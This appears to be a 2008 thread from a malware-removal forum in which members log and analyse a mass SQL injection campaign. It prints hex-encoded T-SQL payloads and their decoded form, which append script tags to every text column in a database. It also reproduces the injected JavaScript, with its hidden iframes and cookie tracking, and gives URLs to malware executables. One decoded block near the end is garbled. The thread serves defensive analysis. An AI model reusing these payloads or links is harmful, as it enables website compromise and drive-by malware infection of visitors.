Author Topic: SQL Injected jscript sites  (Read 71637 times)

0 Members and 1 Guest are viewing this topic.

August 07, 2008, 06:35:00 pm
Reply #90

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

The link is returning a 500 Internal server error.

In all we have seen this same sql injection attempt from 35 indivdual IPs today.
Try google to count infected forum posts...

August 09, 2008, 10:38:21 am
Reply #91

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Log entry, with IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39 +0000] "GET /rrpad/pad.xml?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

decoded
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39  0000] "GET /rrpad/pad.xml?';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

Code: [Select]
--11:24:09--  http://sdo.1000mg.cn/csrss/w.js
           => `w.js'
Resolving sdo.1000mg.cn... 121.11.76.85
Connecting to sdo.1000mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
window.onerror=function(){return true;}
if(typeof(js86eus)=="undefined")
{
var js86eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/kk/kk.htm></iframe>");
}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

The iframe link to count41.51yes.com returns a 500 internal server error, both iframe links too plgou.com are active.

In all we saw this script from 236 indivdual IPs today.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

August 09, 2008, 10:44:05 am
Reply #92

Kayrac

  • Guest
Code: [Select]
http://www.plgou.com/kk/rondll32.exe#version=1,0,0,1
for direct link to file, gonna run it in a sec when i get vmware back up and running

-Brian

different file here also
Code: [Select]
http://www.plgou.com/csrss/rondll32.exe

August 09, 2008, 01:06:15 pm
Reply #93

Kayrac

  • Guest
ok the KK rondll file drops 2 files in the windows font folders


the other one(csrss one) downloads these two
Code: [Select]
http://www.plgou.com/comine/sl.exe

http://www.plgou.com/comine/server.exe
more to come!

Code: [Select]
http://www.plgou.com/csrss/index.html
which lists
Code: [Select]
2008-08-08 http://www.plgou.com/comine/sss.exe
2008-08-08 http://www.plgou.com/comine/sl.exe
2008-08-08 http://www.plgou.com/comine/server.exe

Sl.exe won't run on vista, stupid vista :(

-Brian

August 12, 2008, 08:20:05 pm
Reply #94

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thanks.

August 15, 2008, 02:48:13 pm
Reply #95

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
Quote
hxxp://a.mm861.com/1.js
   <_SCRIPT src="hxxp://a.mm861.com/1.js"></_SCRIPT>
   <_IFRAME src="hxxp://www.6980982jh.com/tt1.html" width=0 height=0></_IFRAME>
   <_IFRAME src="hxxp://www.mydearsister.net/css/ad.htm" width=50 height=0></_IFRAME>
   <_IFRAME src="hxxp://www.80man.com.cn/index.htm" width=0 height=0></_IFRAME>

Thank you Malzilla

August 15, 2008, 04:41:27 pm
Reply #96

Kayrac

  • Guest
from that js file above

Code: [Select]
51js.th-club.com/1794424.js
51js.th-club.com/2039774.js
51js.th-club.com/2068633.js
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2039774&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.mydearsister.net/css/ad.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2068633&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.80man.com.cn/index.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=31&id=1794424&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.6980982jh.com/tt1.html
count14.51yes.com/click.aspx?id=146836447&logo=1
count14.51yes.com/count1.gif
count14.51yes.com/sa.aspx?id=146836447&refe=http%3A//www.6980982jh.com/tt1.html&location=http%3A//www.rigoogle.com/&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
count4.51yes.com/click.aspx?id=48870943&logo=1
count4.51yes.com/count1.gif
count4.51yes.com/sa.aspx?id=48870943&refe=&location=http%3A//www.6980982jh.com/tt1.html&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
icon.ajiang.net/icon_0.gif
www.6980982jh.com/favicon.ico
www.6980982jh.com/tt1.html
www.80man.com.cn/14.htm
www.80man.com.cn/4561.swf
www.80man.com.cn/WIN%209,0,47,0i.swf
www.80man.com.cn/css/css.exe
www.80man.com.cn/favicon.ico
www.80man.com.cn/flash.htm
www.80man.com.cn/index.htm
www.80man.com.cn/kkk.exe
www.80man.com.cn/office.htm
www.80man.com.cn/re10.htm
www.80man.com.cn/re11.htm
www.mydearsister.net/css/ad.htm
www.mydearsister.net/css/dadongi.asp?dadong=WIN%209,0,47,0
www.mydearsister.net/css/dadongi.swf
www.mydearsister.net/css/dd.exe
www.mydearsister.net/css/dx.exe
www.mydearsister.net/css/index.htm
www.mydearsister.net/css/kr.exe
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/mx.exe
www.mydearsister.net/css/ress.htm
www.mydearsister.net/favicon.ico
www.mydearsister.net/u.exe
www.mydearsister.netPOST/Count/Count.asp(application/x-www-form-urlencoded)
www.rigoogle.com/
www.rigoogle.com/flash.htm
www.rigoogle.com/help.exe
www.rigoogle.com/i47.swf
www.rigoogle.com/issf.html
www.rigoogle.com/office.htm
www.rigoogle.com/re10.htm
www.rigoogle.com/swfobject.js
 

August 16, 2008, 09:31:51 am
Reply #97

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

August 16, 2008, 10:54:45 am
Reply #98

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Sample log out of a total of 398 seperate injection attempts involving the same script within the last 24 hours, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [16/Aug/2008:03:00:47 +0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Decoded, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx- - [16/Aug/2008:03:00:47  0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Raw 
AS CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"


Code: [Select]
--11:18:59--  http://www3.800mg.cn/csrss/w.js
           => `w.js'
Resolving www3.800mg.cn... 121.11.76.85
Connecting to www3.800mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

SQL injection script
Code: [Select]
window.onerror=function(){return true;}
if(typeof(js8eus)=="undefined")
{
var js8eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=1 src=http://www3.800mg.cn/csrss/new.htm></iframe>");

}else{

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}



Second iframe link
Code: [Select]
--11:21:14--  http://www3.800mg.cn/csrss/new.htm
           => `new.htm'
Resolving www3.800mg.cn... 121.11.76.85
Connecting to www3.800mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2063988.js"></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src='http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288' language='javaScript' charset='gb2312'></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


First iframe link
Code: [Select]
--11:24:21--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>



Secondary iframe
Code: [Select]
--11:29:33--  http://js.users.51.la/2063988.js
           => `2063988.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2063988" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a3988tf="51la";var a3988pu="";var a3988pf="51la";var a3988su=window.location;var a3988sf=document.referrer;var a3988of="";var a3988op="";var a3988ops=1;var a3988ot=1;var a3988d=new Date();var a3988color="";if (navigator.appName=="Netscape"){a3988color=screen.pixelDepth;} else {a3988color=screen.colorDepth;}<\/script><script>a3988tf=top.document.referrer;<\/script><script>a3988pu =window.parent.location;<\/script><script>a3988pf=window.parent.document.referrer;<\/script><script>a3988ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3988ops=(a3988ops==null)?1: (parseInt(unescape((a3988ops)[2]))+1);var a3988oe =new Date();a3988oe.setTime(a3988oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3988ops+ ";path=/;expires="+a3988oe.toGMTString();a3988ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3988ot==null){a3988ot=1;}else{a3988ot=parseInt(unescape((a3988ot)[2])); a3988ot=(a3988ops==1)?(a3988ot+1):(a3988ot);}a3988oe.setTime(a3988oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3988ot+";path=/;expires="+a3988oe.toGMTString();<\/script><script>a3988of=a3988sf;if(a3988pf!=="51la"){a3988of=a3988pf;}if(a3988tf!=="51la"){a3988of=a3988tf;}a3988op=a3988pu;try{lainframe}catch(e){a3988op=a3988su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2063988&tpages=\'+a3988ops+\'&ttimes=\'+a3988ot+\'&tzone=\'+(0-a3988d.getTimezoneOffset()/60)+\'&tcolor=\'+a3988color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3988of)+\'&vpage=\'+escape(a3988op)+\'" \/>\');<\/script>');


Script link
Code: [Select]
--11:35:17--  http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288
           => `stat.php?id=1005288&web_id=1005288'
Resolving s135.cnzz.com... 219.232.241.139
Connecting to s135.cnzz.com[219.232.241.139]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.38678100 1218883460';
var cnzz_a=gc_cnzz("cnzz_a1005288");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1005288" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="http://222.77.187.108/stat.htm?id=1005288'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1005288="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

August 16, 2008, 05:29:36 pm
Reply #99

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

August 17, 2008, 10:59:07 am
Reply #100

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Further to my post August 16, 2008 we had a total of 2,051 injection attempts involving this same script in the last 24 hours
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

August 18, 2008, 09:26:15 am
Reply #101

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
With reference to my post August 16, 2008 we had a total of 1552 injection attempts involving this same script in the last 24 hours.

The link is now returning a 500 internal server error.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

August 20, 2008, 09:59:36 am
Reply #102

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
New SQL injection attempt from sdo.1000mg.cn/csrss/w.js

Original encoded form
Code: [Select]
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207!
372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script 7!
7&3&嘒GⅡ6F蜚謗6怫77'72鱮妲2#懵67&C懵乙rrr攄UD4銾匓e$粢F&芔7W'6"斿DB2T銪4孽4RF&芔7W'6"DT哪4DRF&芔7W'62

The link returns a 500 Internal server error.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

August 21, 2008, 11:11:43 am
Reply #103

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
New sql injection, weve seen 418 seperate injection attempts involving the script within the last 24 hours.



Sample Log entry, IP obfuscated for privacy
Code: [Select]
